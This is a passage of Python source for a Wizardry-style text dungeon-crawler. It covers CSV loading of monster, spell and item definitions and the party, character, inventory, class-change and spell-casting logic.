row[18].lower() == 'true':\n paraly = True\n stone = False\n if row[19].lower() == 'true':\n stone = True\n critical = False\n if row[20].lower() == 'true':\n critical = True\n try:\n drain = int(row[21])\n except:\n drain = 0\n try:\n heal = int(row[23])\n except:\n heal = 0\n try:\n regdeathp = int(row[24])\n except:\n regdeathp = 0\n regfire = False\n if row[25].lower() == 'true':\n regfire = True\n regcold = False\n if row[26].lower() == 'true':\n regcold = True\n regpoison = False\n if row[27].lower() == 'true':\n regpoison = True\n try:\n regspellp = int(row[28])\n except:\n regspellp = 0\n weakmaka = False\n if row[29].lower() == 'true':\n weakmaka = True\n weaksleep = False\n if row[30].lower() == 'true':\n weaksleep = True\n friendly = False\n if row[31].lower() == 'true':\n friendly = True\n try:\n exp = int(row[32])\n except:\n exp = 0\n floors = row[34] # floors\n if floors == '':\n floors = {999}\n else:\n floors_tmp = re.split(r',\\s*', floors)\n floors = set()\n for floor in floors_tmp:\n try:\n floor = int(floor)\n except:\n floor = 999\n floors.add(floor)\n try:\n fellowp = int(row[36])\n except:\n fellowp = 0\n try:\n agi = int(row[37])\n except:\n agi = 10\n treasure = row[38]\n if treasure == '':\n treasure = []\n else:\n treasure_tmp = re.split(r',\\s*', treasure)\n treasure = []\n for level in treasure_tmp:\n try:\n level = int(level)\n treasure.append(level)\n except:\n pass\n tmp_monster \\\n = Tmpmonster(row[2], row[3], row[4], row[5], row[6],\n level, row[8], ac, row[10], count, row[12],\n row[13], row[14], row[15], row[16], poison, paraly,\n stone, critical, drain, row[22], heal,\n regdeathp, regfire, regcold, regpoison,\n regspellp, weakmaka, weaksleep, friendly,\n exp, row[33], floors, row[35], fellowp, agi,\n treasure)\n tmp_dic[row[1]] = tmp_monster\n\n monster_def = {}\n for wizname, m in tmp_dic.items():\n if m.fellowwiz == '':\n fellow = ''\n else:\n fellow = tmp_dic[m.fellowwiz].name\n monster = Monster(m[1], m[2], m[3], m[4], m[5], m[6], m[7], m[8],\n m[9], (m[10], m[11], m[12], m[13], m[14]), m[15],\n m[16], m[17], m[18], m[19], m[20], m[21], m[22],\n m[23], m[24], m[25], m[26], m[27], m[28], m[29],\n m[30], m[31], m[32], fellow, m[34], m[35], m[36])\n monster_def[m.name] = monster\n self.mondef = monster_def\n\n def load_spelldef(self):\n \"\"\"\n load spell definition file\n \"\"\"\n Spell = collections.namedtuple(\n 'Spell', ['categ', 'level', 'battle', 'camp', 'type', 'target', 'value', 'attr', 'desc'])\n with open('spells.csv') as csvfile:\n rdr = csv.reader(csvfile)\n spell_def = {}\n for i, row in enumerate(rdr):\n if i == 0:\n continue\n attr = self.cell2strtup(row[10])\n # (0categ, 1level, 2battle, 3camp, 4type, 5target, 6value,\n # 7attr, 8desc)\n spell = Spell(row[1], int(row[2]), json.loads(row[5].lower()),\n json.loads(row[6].lower()), row[7], row[8], row[9], attr, row[12])\n spell_def[row[3]] = spell\n self.spelldef = spell_def\n\n def load_itemdef(self):\n \"\"\"\n load item definition file\n \"\"\"\n Item = collections.namedtuple(\n 'Item', ['level', 'unident', 'type', 'range', 'jobs', 'ac',\n 'st', 'at', 'dice', 'shop', 'price', 'curse',\n 'hp', 'use', 'brk', 'regist', 'twice', 'align',\n 'sp', 'target'])\n\n with open('items.csv') as csvfile:\n rdr = csv.reader(csvfile)\n item_def = {}\n for i, row in enumerate(rdr):\n if i == 0 or not row:\n continue\n try:\n level = int(row[1])\n except:\n level = 0\n if not (name := row[2]):\n name = row[4]\n if not (unident := row[3]):\n unident = row[5]\n try:\n ac = int(row[9])\n except:\n ac = 0\n try:\n st = int(row[10])\n except:\n st = 0\n try:\n at = int(row[11])\n except:\n at = 0\n try:\n shop = int(row[13])\n except:\n shop = 0\n try:\n price = int(row[14])\n except:\n price = 0\n if row[15] == 'TRUE':\n curse = True\n else:\n curse = False\n try:\n hp = int(row[16])\n except:\n hp = 0\n try:\n brk = int(row[18])\n except:\n brk = 0\n regist = self.cell2strtup(row[19])\n twice = self.cell2strtup(row[20])\n align = self.cell2strtup(row[21])\n # (0level, 1unident, 2type, 3range, 4jobs, 5ac, 6st, 7at,\n # 8dice, 9shop, 10price, 11curse, 12hp, 13use, 14brk,\n # 15regist, 16twice, 17align, 18sp, 19target)\n item = Item(level, unident, row[6], row[7], row[8], ac,\n st, at, row[12], shop, price,\n curse, hp, row[17], brk, regist, twice, align,\n row[22], row[23])\n item_def[name] = item\n self.itemdef = item_def\n self.shopitems = {}\n for name in self.itemdef:\n self.shopitems[name] = self.itemdef[name].shop\n\n def cell2strtup(self, cell):\n if cell == '':\n rtn = ()\n else:\n tmp = re.split(r',\\s*', cell)\n rtn = []\n for t in tmp:\n rtn.append(t)\n rtn = tuple(rtn)\n return rtn\n\n\nclass Party:\n # Represents a party\n def __init__(self, x, y, floor):\n self.x = self.px = x\n self.y = self.py = y\n self.floor = self.pfloor = floor\n self.tsubasa_floor = 1 # to which floor? (valid when floor_move=3)\n self.floor_move = 0 # floor move flag\n self.resumed = False # resume flag\n self.place = Place.EDGE_OF_TOWN\n self.floor_obj = ''\n self.members = []\n self.light_cnt = 0 # milwa=+30-45, lomilwa=+9999\n self.ac = 0 # -2 if maporfic\n self.silenced = False # can't cast spell\n self.identify = False # latumapic\n self.gps = False # eternal dumapic\n\n def injured(self):\n \"\"\"\n Check if someone is injured and return True/False\n dead, ashed, lost members are not counted\n \"\"\"\n for mem in self.members:\n if mem.state in [State.DEAD, State.ASHED, State.LOST]:\n continue\n if mem.hp < mem.maxhp:\n return True\n return False\n\n def cast_spell(self, game, spell, target='party'):\n \"\"\"\n If someone can cast the spell, cast it and return True\n If not, return False\n Only support heal and etc spells for now\n \"\"\"\n for mem in self.members:\n if mem.state in [State.DEAD, State.ASHED, State.LOST]:\n continue\n if game.spell.cancast(mem, spell, consume=True):\n game.vscr.meswins[-1].print(f\"{mem.name} casted {spell}\")\n if spell in ['gps', 'hogo', 'shikibetsu', 'hikarinotama']:\n game.spell.etc(mem, spell, target)\n else:\n game.spell.heal(mem, spell, target)\n game.vscr.disp_scrwin()\n getch(wait=True)\n return True\n return False\n\n def prep(self, game):\n \"\"\"\n Cast hogo, shikibetsu, gps and lomilwa\n \"\"\"\n if self.ac == 0:\n self.cast_spell(game, 'hogo')\n if not self.identify:\n self.cast_spell(game, 'shikibetsu')\n if not self.gps:\n self.cast_spell(game, 'gps')\n if self.light_cnt < 1000:\n self.cast_spell(game, 'hikarinotama')\n\n def heal(self, game):\n \"\"\"\n Heal all members in the party\n \"\"\"\n while self.injured():\n if not self.cast_spell(game, 'zenkai'):\n if not self.cast_spell(game, 'zenjiai'):\n break\n for mem in self.members:\n if mem.state in [State.DEAD, State.ASHED, State.LOST]:\n continue\n if mem.hp == mem.maxhp:\n continue\n if not self.cast_spell(game, 'kanzen', mem):\n if not self.cast_spell(game, 'daikaifuku', mem):\n if not self.cast_spell(game, 'iyashi', mem):\n if not self.cast_spell(game, 'jiai', mem):\n return\n\n def defeated(self):\n \"\"\"\n Party defeat check after a battle, a boss battle or a chest\n \"\"\"\n if sum(1 for m in self.members\n if m.state in [State.OK, State.ASLEEP]):\n return False # at least one survives\n return True # defeated\n\n def move(self, x, y, floor=None):\n \"\"\"\n Move party to the specified (x, y) and optional floor\n \"\"\"\n self.px = self.x\n self.py = self.y\n self.x = x\n self.y = y\n self.pfloor = self.floor\n if floor:\n self.floor = floor\n\n def calc_hpplus(self, game):\n for mem in self.members:\n mem.hpplus = sum(game.itemdef[item[0]].hp for item in mem.items)\n if mem.poisoned:\n mem.hpplus -= 1\n\n def consume_item(self, item):\n \"\"\"\n Consume one item in the party member inventory\n \"\"\"\n for mem in self.members:\n if item in mem.items:\n mem.items.remove(item)\n break\n\n def have_items(self, itemlist):\n \"\"\"\n Return True someone in the party has one in itemlist\n \"\"\"\n for it in itemlist:\n if it in [item[0] for mem in self.members\n for item in mem.items]:\n return True\n return False\n\n def reorder(self, game):\n \"\"\"\n Reorder party members\n \"\"\"\n v = game.vscr\n mw = v.meswins[-1]\n dst = []\n idx = 1\n while True:\n c = mw.input_char(f\"Who comes #{idx}? - # or l)eave\")\n if c == 'l':\n break\n try:\n i = int(c)\n mem = self.members[i-1]\n except:\n mw.print(\"What?\")\n continue\n if mem in dst:\n mw.print(\"Already chosen.\")\n continue\n dst.append(mem)\n if len(dst) == len(self.members):\n self.members = dst\n break\n idx += 1\n\n def pay(self, gold):\n \"\"\"\n Pay the price as a party. Each member tries to pay their\n share but if they can't afford, someone will pay.\n \"\"\"\n total = 0\n for mem in self.members:\n total += mem.gold\n if total < gold:\n return False # Can't afford\n\n num = len(self.members)\n each = gold // num\n remain = gold % num\n for mem in self.members:\n if mem.gold >= each:\n mem.gold -= each\n else:\n remain += each - mem.gold\n mem.gold = 0\n\n for mem in self.members:\n if mem.gold >= remain:\n mem.gold -= remain\n return True\n else:\n remain -= mem.gold\n mem.gold = 0\n\n def can_open(self, game, ch=b'*'):\n \"\"\"\n Check if they can unlock the door\n Returns True if they can, False otherwise\n \"\"\"\n if ch == b'%':\n if game.party.floor == 3:\n keys = ['ivory key', 'bronze key', 'silver key', 'gold key']\n elif game.party.floor == 6:\n keys = ['bronze key', 'silver key', 'gold key']\n elif game.party.floor == 9:\n keys = ['silver key', 'gold key']\n elif game.party.floor == 10:\n keys = ['gold key']\n elif game.party.floor >= 11:\n keys = ['one time password']\n if game.party.have_items(keys):\n return True\n return False\n\n lvl = 1\n for mem in self.members:\n if mem.job in [Job.THIEF, Job.NINJA]:\n lvl = max(lvl, mem.level)\n else:\n lvl = max(lvl, mem.level//5+1)\n chance = max((lvl+1-self.floor)*10, 5)\n if random.randrange(100) < chance:\n return True\n else:\n return False\n\n def choose_character(self, game):\n \"\"\"\n Choose and return a party member\n Return False if not chosen\n \"\"\"\n mw = game.vscr.meswins[-1]\n while True:\n ch = mw.input_char(f\"Who? - # or l)eave\")\n if ch == 'l':\n break\n try:\n if 0 <= (chid := int(ch)-1) < len(game.party.members):\n break\n except:\n pass\n if ch == 'l':\n return False\n return self.members[chid]\n\n def remove_character(self, game):\n \"\"\"\n Choose and remove a party member\n \"\"\"\n mw = game.vscr.meswins[-1]\n while True:\n ch = mw.input_char(f\"Remove who? - # or l)eave\")\n if ch == 'l':\n break\n try:\n if 0 <= (chid := int(ch)-1) < len(game.party.members):\n del self.members[chid]\n game.vscr.disp_scrwin()\n except:\n pass\n\n\nclass Member:\n # Represents a character\n def __init__(self, name, align, race):\n self.name = name\n self.align = align\n self.race = race\n self.level = 1\n self.ac = 10\n self.acplus = 0 # valid only in battle\n self.job = Job.UNEMPLOYED\n self.state = State.OK\n self.silenced = False # valid only in battle\n self.poisoned = False\n self.inspected = False # valid only for inspecting chest\n self.deepest = 1 # deepest floor visited at least once\n self.floor = 0 # for defeated party member\n self.in_maze = False # for defeated party member\n self.gold = random.randrange(100, 200)\n self.exp = 0\n self.nextexp = 0\n self.marks = 0\n self.rip = 0\n self.items = [] # 0name, 1equipped, 2cursed, 3unidentified\n self.stat = [0, 0, 0, 0, 0, 0]\n self.stat[0], self.stat[1], self.stat[2], self.stat[3], self.stat[4], \\\n self.stat[5] = race_status[race]\n self.maxhp = 0\n self.hp = self.maxhp\n self.hpplus = 0 # -1 if poisoned, >0 if healing item\n self.mspells = []\n self.pspells = []\n self.mspell_cnt = [0, 0, 0, 0, 0, 0, 0]\n self.pspell_cnt = [0, 0, 0, 0, 0, 0, 0]\n self.mspell_max = [0, 0, 0, 0, 0, 0, 0]\n self.pspell_max = [0, 0, 0, 0, 0, 0, 0]\n\n def __repr__(self):\n return f\"<{self.name}, {self.align.name[:1]}-{self.race.name[:3]}-{self.job.name[:3]} {self.stat[0]}/{self.stat[1]}/{self.stat[2]}/{self.stat[3]}/{self.stat[4]}>\"\n\n def __str__(self):\n return f\"{self.name[:16].ljust(16)} Lv{self.level:3d} {self.race.name[:3].lower()}-{self.align.name[:1].lower()}-{self.job.name[:3].lower()}\"\n\n def disp_character(self, game):\n \"\"\"\n Display a character information in the message window\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n mw.mes_lines = []\n mw.print(\n f\"{self.name.ljust(16)} L{self.level:3d} {self.align.name[:1].lower()}-{self.job.name[:3].lower()} {self.race.name.lower()}\", start=' ')\n mw.print(f\"\", start=' ')\n mw.print(\n f\"strength {self.stat[0]:2d} gold {self.gold:16d} lvl {self.level:5d}\", start=' ')\n mw.print(\n f\" i.q. {self.stat[1]:2d} e.p. {self.exp:16d} rip {self.rip:5d}\", start=' ')\n mw.print(\n f\" piety {self.stat[2]:2d} next {self.nextexp:16d} a.c.{self.ac:5d}\", start=' ')\n mw.print(\n f\"vitality {self.stat[3]:2d} marks {self.marks:15d} depth{self.deepest:4d}\", start=' ')\n mw.print(\n f\" agility {self.stat[4]:2d} h.p. {self.hp:7d}/{self.maxhp:7d}\", start=' ')\n mw.print(\n f\" luck {self.stat[5]:2d} status {self.state.name}\", start=' ')\n mw.print(f\"\", start=' ')\n mw.print(f\"mage {self.mspell_cnt[0]}/{self.mspell_cnt[1]}/{self.mspell_cnt[2]}/{self.mspell_cnt[3]}/{self.mspell_cnt[4]}/{self.mspell_cnt[5]}/{self.mspell_cnt[6]} priest {self.pspell_cnt[0]}/{self.pspell_cnt[1]}/{self.pspell_cnt[2]}/{self.pspell_cnt[3]}/{self.pspell_cnt[4]}/{self.pspell_cnt[5]}/{self.pspell_cnt[6]}/\", start=' ')\n for idx in range(8):\n try:\n item = self.items[idx]\n m = ' '\n if self.job.name[:1].lower() not in \\\n game.itemdef[item[0]].jobs.lower():\n m = '#' # can't equip\n if item[1]:\n m = '*' # equipped\n if item[2]:\n m = '&' # cursed\n if self.items[idx][3]: # unidentified\n l = f\"{m}?{game.itemdef[item[0]].unident}\"\n else:\n l = f\"{m}{item[0]}\"\n except:\n l = ''\n if idx % 2:\n mw.print(f\"{idx}) {ol.ljust(18)} {idx+1}) {l.ljust(18)}\",\n start=' ')\n ol = l\n\n def inspect_character(self, game):\n \"\"\"\n Inspect a character\n Show the character info and dispatch item or spell menus\n \"\"\"\n mw = game.vscr.meswins[-1]\n while game.party.members:\n if game.party.floor_move and game.party.place == Place.CAMP:\n break\n self.disp_character(game)\n mw.print(f\"\", start=' ')\n c1 = mw.input_char(\"i)tems s)pells c)lass jk)change member l)leave\",\n values=['i', 's', 'c', 'j', 'k', 'l'])\n if c1 == 'l':\n mw.cls()\n return 0 # leave\n elif c1 == 'i':\n self.item_menu(game)\n elif c1 == 's':\n self.spell_menu(game)\n elif c1 == 'c' and game.party.place == Place.TRAINING_GROUNDS:\n self.change_classes(game)\n elif c1 == 'j':\n return 1 # next member\n elif c1 == 'k':\n return -1 # previous member\n return 0\n\n def view_spells(self, game):\n \"\"\"\n View mage and priest spell list that he/she has mastered\n \"\"\"\n v = game.vscr\n sw = Meswin(v, 1, 2, 76, 14)\n v.meswins.append(sw)\n d = game.spelldef\n lines = []\n if self.mspells:\n lines.append(\"Mage spells:\")\n for name in self.mspells:\n lines.append(\n f\"{d[name].level} {name.ljust(13)}{d[name].desc[:57]}\")\n lines.append(\"\")\n if self.pspells:\n lines.append(\"Priest spells:\")\n for name in self.pspells:\n lines.append(\n f\"{d[name].level} {name.ljust(13)}{d[name].desc[:57]}\")\n if len(lines) <= 14-1:\n for l in lines:\n sw.print(l, start=' ')\n sw.print(\"Press any key.\")\n v.disp_scrwin()\n getch()\n else:\n idx = 0\n while True:\n sw.cls()\n for l in lines[idx:idx+14-1]:\n sw.print(l, start=' ')\n sw.print(\"j)down k)up l)eave\")\n v.disp_scrwin()\n c = getch(wait=True)\n if c == 'j' and idx < len(lines)-14+1:\n idx += 1\n elif c == 'k' and idx > 0:\n idx -= 1\n elif c == 'l':\n break\n # sw.cls()\n v.disp_scrwin()\n v.meswins.pop()\n v.cls()\n\n def spell_menu(self, game):\n \"\"\"\n Spell menu. Cast, read spells.\n \"\"\"\n v = game.vscr\n mw = Meswin(v, 14, 4, 44, 12, frame=True)\n v.meswins.append(mw)\n while not game.party.floor_move or \\\n game.party.place not in \\\n [Place.MAZE, Place.CAMP, Place.BATTLE]: # if not tsubasa\n mw.print(\"Spell memu:\")\n c = mw.input_char(\"c)ast spell v)iew list l)eave\",\n values=['c', 'v', 'l'])\n if c == 'l':\n break\n elif c == 'c':\n if game.party.place in [Place.CAMP, Place.BATTLE]:\n game.spell.cast_spell(self)\n else:\n mw.print(\"Can't cast spell now.\")\n v.disp_scrwin()\n elif c == 'v':\n self.view_spells(game)\n # mw.cls()\n v.disp_scrwin()\n v.meswins.pop()\n v.cls()\n\n def item_menu(self, game):\n \"\"\"\n Item menu. Use, equip, trade, drop an item.\n \"\"\"\n vscr = game.vscr\n iw = Meswin(vscr, 14, 2, 44, 8, frame=True)\n vscr.meswins.append(iw)\n while True:\n iw.print(\"which item? # or l)leave\")\n vscr.disp_scrwin()\n c = getch()\n if c == 'l':\n vscr.meswins.pop()\n vscr.cls()\n return\n try:\n if (inum := int(c)-1) > len(self.items)-1:\n continue\n except:\n continue\n dispname = self.items[inum][0]\n if self.items[inum][3]: # unidentified\n dispname = ''.join(['?', game.itemdef[dispname].unident])\n iw.print(f\"{inum+1}) {dispname}\", start=' ')\n c = iw.input_char(\"u)se e)quip t)rade d)rop l)eave\",\n values=['u', 'e', 't', 'd', 'l'])\n if c == 'l':\n continue\n elif c == 'u':\n if self.items[inum][3]: # unidentified:\n iw.print(f\"Tried to use {dispname}.\")\n iw.print(\n \".. but don't know how to use it.\", start=' ')\n vscr.disp_scrwin()\n else:\n itemdef = game.itemdef[self.items[inum][0]]\n if not itemdef.use:\n iw.print(f\"Tried to use {dispname}.\")\n iw.print(\".. but wasn't able to.\", start=' ')\n vscr.disp_scrwin()\n elif itemdef.use == 'etc':\n iw.print(f\"Used {dispname}.\")\n vscr.disp_scrwin()\n if self.items[inum][0] == 'muramasa blade':\n self.stat[0] += 1 # str+1\n elif self.items[inum][0] == 'kaiser knuckles':\n self.maxhp += 1 # hp+1\n elif self.items[inum][0] == 'armor of lords':\n for m in game.party.members:\n m.hp = m.maxhp\n elif self.items[inum][0] == 'ninja dagger':\n self.job = Job.NINJA\n for i in self.items:\n i[1] = False\n if itemdef.brk > random.randrange(100):\n self.items[inum][0] = 'broken item'\n getch(wait=True)\n vscr.meswins.pop()\n vscr.cls()\n return\n else: # magic spell\n sdef = game.spelldef[itemdef.use]\n if not sdef.camp:\n iw.print(\"Can't use it now.\")\n if sdef.target == 'member':\n target = game.party.choose_character(\n game)\n if not target:\n #mw = game.vscr.meswins[-1]\n iw.print(\"Aborted.\", start=' ')\n continue\n else:\n target = sdef.target\n iw.print(f\"Used {dispname}.\")\n vscr.disp_scrwin()\n game.spell.cast_spell_dispatch(\n self, itemdef.use, target)\n if itemdef.brk > random.randrange(100):\n self.items[inum][0] = 'broken item'\n vscr.meswins.pop()\n vscr.cls()\n return\n elif c == 't':\n if self.items[inum][2]:\n iw.print(f\"Cursed.\")\n vscr.disp_scrwin()\n continue\n elif self.items[inum][1]:\n iw.print(f\"Equipped.\")\n vscr.disp_scrwin()\n continue\n target = game.party.choose_character(game)\n if target and len(target.items) < 8:\n target.items.append(self.items[inum])\n self.items.pop(inum)\n iw.print(f\"Gave to {target.name}.\")\n vscr.disp_scrwin()\n getch(wait=True)\n vscr.meswins.pop()\n vscr.cls()\n break\n elif c == 'd':\n if self.items[inum][2]:\n iw.print(f\"Cursed.\")\n vscr.disp_scrwin()\n continue\n elif self.items[inum][1]:\n iw.print(f\"Equipped.\")\n vscr.disp_scrwin()\n continue\n c = iw.input_char(f\"Drop {dispname}? (y/n)\",\n values=['y', 'n'])\n if c == 'y':\n self.items.pop(inum)\n iw.print(f\"Dropped {dispname}.\")\n vscr.disp_scrwin()\n vscr.meswins.pop()\n vscr.cls()\n break\n elif c == 'e':\n if self.job.name[:1] not in game.itemdef[self.items[inum][0]].jobs:\n iw.print(\"Can't equip the item.\")\n continue\n for item in self.items:\n if game.itemdef[self.items[inum][0]].type \\\n == game.itemdef[item[0]].type:\n if item[2]: # already cursed\n iw.print(\"Already equipped a cursed item.\")\n break\n elif item[1]: # equipped\n item[1] = False\n self.calc_ac(game)\n vscr.meswins.pop()\n vscr.cls()\n # vscr.disp_scrwin()\n return\n if game.itemdef[self.items[inum][0]].curse:\n self.items[inum][2] = True # cursed\n iw.print(\"Cursed!\")\n vscr.disp_scrwin()\n getch()\n self.items[inum][1] = True # equipped\n self.calc_ac(game)\n vscr.meswins.pop()\n vscr.cls()\n # vscr.disp_scrwin()\n return\n\n def calc_ac(self, game):\n \"\"\"\n Utility method to calculate AC\n \"\"\"\n self.ac = 10\n for item in self.items:\n if item[1] or item[2]:\n self.ac += game.itemdef[item[0]].ac\n\n def job_applicable(self, sp, jobnum):\n \"\"\"\n Utility function to check if the character is applicable for the job\n \"\"\"\n for i in range(6):\n if sp[i]+self.stat[i] < job_requirements[Job(jobnum)][i]:\n return False\n if job_requirements[Job(jobnum)][6][self.align.value]:\n return True\n else:\n return False\n\n def calc_bonus(self):\n \"\"\"\n Calculate bonus points (on creating a character)\n \"\"\"\n bonus = random.randrange(5, 10)\n for _ in range(3):\n if random.randrange(6) == 0:\n bonus += 10\n return bonus\n\n def bonus_disp(self, game, bonus, y, sp):\n \"\"\"\n Display bonus assignment screen\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n mw.cls()\n mw.print(\"Distribute bonus points -\")\n mw.print(\" h)minus j)down k)up l)plus\", start=' ')\n mw.print(\" .)change bonus x)done\", start=' ')\n mw.print(\"\", start=' ')\n mw.print(f\" strength {sp[0]+self.stat[0]:2d}\", start=' ')\n mw.print(f\" iq {sp[1]+self.stat[1]:2d}\", start=' ')\n mw.print(f\" piety {sp[2]+self.stat[2]:2d}\", start=' ')\n mw.print(f\" vitality {sp[3]+self.stat[3]:2d}\", start=' ')\n mw.print(f\" agility {sp[4]+self.stat[4]:2d}\", start=' ')\n mw.print(f\" luck {sp[5]+self.stat[5]:2d}\", start=' ')\n mw.print(f\"\\n bonus {bonus:2d}\", start=' ')\n mw.print(\"\", start=' ')\n mw.mes_lines[y+4] = mw.mes_lines[y+4][:13] + \\\n '>' + mw.mes_lines[y+4][14:]\n line = ''\n job = False\n for jobnum in range(8):\n if self.job_applicable(sp, jobnum):\n job = True\n line = ''.join([line, Job(jobnum).name[:].lower(), ' '])\n mw.print(line, start=' ')\n vscr.disp_scrwin()\n return job\n\n def change_classes(self, game):\n \"\"\"\n Change classes\n \"\"\"\n v = game.vscr\n mw = v.meswins[-1]\n statplus = [0, 0, 0, 0, 0, 0]\n jobs = [';']\n jobnames = ''\n line = ''\n for jobnum in range(8):\n if self.job_applicable(statplus, jobnum) and self.job != Job(jobnum):\n jobnames = ' '.join([jobnames, Job(jobnum).name.lower()])\n line = '/'.join([line, Job(jobnum).name[:1].lower()])\n jobs.append(Job(jobnum).name[:1].lower())\n line = line[1:] # remove the first '/'\n mw.print(f\"{self.name} can apply for:\")\n mw.print(f\" {jobnames}\")\n c = mw.input_char(f\"Which job to apply? ({line} or ;)leave)\")\n if c == ';' or mw.input_char(\"Are you sure? (y/n)\",\n values=['y', 'n']) != 'y':\n mw.print(\"Cancelled.\")\n v.disp_scrwin()\n return\n for jobnum in range(8):\n if c == Job(jobnum).name[:1].lower():\n break\n self.job = Job(jobnum)\n self.nextexp = level_table[Job(jobnum)][0]\n self.exp = 0\n self.level = 1\n for item in self.items:\n item[1] = item[2] = False\n self.calc_ac(game)\n for i in range(6):\n self.stat[i] = race_status[self.race][i]\n if self.job not in [Job.MAGE, Job.SAMURAI, Job.BISHOP]:\n for spell_level in range(7):\n mastered = sum([\n 1 for spell in game.spelldef\n if game.spelldef[spell].level == spell_level+1 and\n spell in self.mspells])\n self.mspell_max[spell_level] = mastered\n self.mspell_cnt[spell_level] = mastered\n if self.job not in [Job.PRIEST, Job.LORD, Job.BISHOP]:\n for spell_level in range(7):\n mastered = sum([\n 1 for spell in game.spelldef\n if game.spelldef[spell].level == spell_level+1 and\n spell in self.pspells])\n self.pspell_max[spell_level] = mastered\n self.pspell_cnt[spell_level] = mastered\n if self.job == Job.MAGE:\n self.mspells.append('onibi')\n self.mspells.append('shunmin')\n self.mspells = list(set(self.mspells))\n self.mspell_max[0] = self.mspell_cnt[0] = max(\n 2, self.mspell_max[0])\n elif self.job == Job.PRIEST:\n self.pspells.append('jiai')\n self.pspells.append('ikari')\n self.pspells = list(set(self.pspells))\n self.pspell_max[0] = self.pspell_cnt[0] = max(\n 2, self.pspell_max[0])\n mw.print(f\"{self.name} has become a novice {self.job.name.lower()}.\")\n v.disp_scrwin()\n\n def distribute_bonus(self, game):\n \"\"\"\n Bonus assignment and deciding class main routine\n \"\"\"\n v = game.vscr\n newwin = False\n mw = v.meswins[-1]\n if mw.height < 14: # if exisiting window is too narrow\n mw = Meswin(v, 13, 2, 55, 14, frame=True)\n v.meswins.append(mw)\n newwin = True\n bonus = self.calc_bonus()\n y = 0\n statplus = [0, 0, 0, 0, 0, 0]\n while True:\n job = self.bonus_disp(game, bonus, y, statplus)\n c = getch()\n if c == 'x' and bonus == 0 and job:\n break\n elif c == 'j' and y < 5:\n y += 1\n elif c == 'k' and y > 0:\n y -= 1\n elif c == 'h' and statplus[y] > 0:\n statplus[y] -= 1\n bonus += 1\n elif c == 'l' and statplus[y]+self.stat[y] < \\\n race_status[self.race][y]+10 and bonus > 0:\n statplus[y] += 1\n bonus -= 1\n elif c == '.':\n statplus = [0, 0, 0, 0, 0, 0]\n bonus = self.calc_bonus()\n jobs = []\n line = \"Choose class (\"\n for jobnum in range(8):\n if self.job_applicable(statplus, jobnum):\n line = ''.join([line, Job(jobnum).name[:1].lower(), '/'])\n jobs.append(Job(jobnum).name[:1].lower())\n line = ''.join([line[:-1], ')'])\n mw = game.vscr.meswins[-1]\n c = mw.input_char(line, values=jobs)\n for jobnum in range(8):\n if c == Job(jobnum).name[:1].lower():\n break\n self.job = Job(jobnum)\n self.nextexp = level_table[Job(jobnum)][0]\n if self.job == Job.FIGHTER:\n self.maxhp = self.hp = random.randint(8, 15)\n elif self.job == Job.MAGE:\n self.maxhp = self.hp = random.randint(2, 7)\n self.mspells = ['onibi', 'shunmin']\n self.mspell_max = [2, 0, 0, 0, 0, 0, 0]\n self.mspell_cnt = [2, 0, 0, 0, 0, 0, 0]\n elif self.job == Job.PRIEST:\n self.maxhp = self.hp = random.randint(6, 13)\n self.pspells = ['jiai', 'ikari']\n self.pspell_max = [2, 0, 0, 0, 0, 0, 0]\n self.pspell_cnt = [2, 0, 0, 0, 0, 0, 0]\n elif self.job == Job.THIEF or Job.BISHOP:\n self.maxhp = self.hp = random.randint(4, 9)\n elif self.job == Job.SAMURAI:\n self.maxhp = self.hp = random.randint(12, 19)\n elif self.job == Job.LORD:\n self.maxhp = self.hp = random.randint(12, 19)\n else: # ninja\n self.maxhp = self.jp = random.randint(8, 17)\n\n for i in range(6):\n self.stat[i] += statplus[i]\n game.characters.append(self)\n mw.print(\"Character created\")\n game.vscr.disp_scrwin()\n getch(wait=True)\n if newwin:\n v.meswins.pop()\n v.cls()\n\n\nclass Spell:\n \"\"\"\n Has actual spell implementation here\n \"\"\"\n\n def __init__(self, game):\n self.game = game\n\n def cancast(self, mem, spell, consume=False):\n \"\"\"\n Check if mem has mastered the spell and has MP\n Return True if can (and consumed if concume=True)\n Return False if can not\n \"\"\"\n if mem.state not in [State.OK]:\n return False\n spelldef = self.game.spelldef[spell]\n if spell in mem.mspells:\n if mem.mspell_cnt[spelldef.level-1] > 0:\n if consume:\n mem.mspell_cnt[spelldef.level-1] -= 1\n return True\n elif spell in mem.pspells:\n if mem.pspell_cnt[spelldef.level-1] > 0:\n if consume:\n mem.pspell_cnt[spelldef.level-1] -= 1\n return True\n return False\n\n def spell_counts(self, start, diff, level):\n \"\"\"\n Utility funciton to calculate spell counts.\n \"\"\"\n clist = []\n l = level - start\n clist.append(l)\n for _ in range(6):\n l = l - diff\n clist.append(min(max(l, 0), 9))\n return clist\n\n def cast_spell(self, mem):\n game = self.game\n v = game.vscr\n mw = v.meswins[-1]\n s = mw.input(\"What spell to cast?\")\n if s not in game.spelldef: # No such spell\n mw.print(\"What?\", start=' ')\n return\n elif s not in list(itertools.chain(mem.mspells, mem.pspells)):\n mw.print(\"Haven't mastered the spell.\", start=' ')\n return\n\n sdef = game.spelldef[s]\n if game.party.place == Place.BATTLE:\n if not sdef.battle:\n mw.print(\"Can't cast now.\", start=' ')\n return\n elif not sdef.camp: # note: you can use it at tavern, too.\n mw.print(\"Can't cast it now.\", start=' ')\n return\n\n if sdef.categ == 'mage':\n splcntlst = mem.mspell_cnt\n else:\n splcntlst = mem.pspell_cnt\n if splcntlst[sdef.level-1] <= 0:\n mw.print(\"MP exhausted.\", start=' ')\n return\n\n if sdef.target == 'member':\n target = self.game.party.choose_character(self.game)\n if not target:\n mw = self.game.vscr.meswins[-1]\n mw.print(\"Aborted.\", start=' ')\n return\n elif sdef.target in ['enemy', 'group']:\n gnum = self.game.battle.choose_group()\n target = self.game.battle.monp[gnum]\n else:\n target = sdef.target\n\n splcntlst[sdef.level-1] -= 1\n\n mw.print(f\"{mem.name} started casting {s}\", start=' ')\n v.disp_scrwin()\n self.cast_spell_dispatch(mem, s, target)\n\n def cast_spell_dispatch(self, invoker, spell, target):\n sdef = self.game.spelldef[spell]\n if sdef.type == 'heal':\n self.heal(invoker, spell, target)\n elif sdef.type in ['attack', 'death']:\n self.attack(invoker, spell, target)\n elif sdef.type == 'ac':\n self.ac(invoker, spell, target)\n elif sdef.type == 'status':\n self.status(invoker, spell, target)\n elif sdef.type == 'cure':\n self.cure(invoker, spell, target)\n else: # etc\n self.etc(invoker, spell, target)\n\n 